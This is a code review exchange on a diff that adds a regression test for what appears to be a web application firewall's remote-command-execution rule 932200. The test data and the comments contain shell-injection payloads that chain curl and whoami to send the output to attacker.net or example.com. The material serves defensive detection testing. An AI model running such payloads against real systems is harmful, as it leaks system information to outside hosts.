tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932200.yaml

```diff
@@ -230,3 +230,37 @@ tests:
             version: HTTP/1.0
           output:
             log_contains: id "932200"
+  - test_title: 932200-15
+    desc: "Add test to match BB EBIDJ91T"
+    stages:
+      - stage:
+          input:
+            dest_addr: 127.0.0.1
+            data: a%3Dcurl%26%26b%3Dwhoami%26%26%24a%20attacker.net%2F%24b
```

Comment:
The original payload is 
```
code=a=curl&&b=\`whoami\`&&\$a example.com/\$b
```

Your payload is
```
a=curl&&b=whoami&&$a attacker.net/$b
```

Apparently enough to trigger, but why the diff?

Reply:
Don't know, maybe bad copy&paste? Changed to original payload.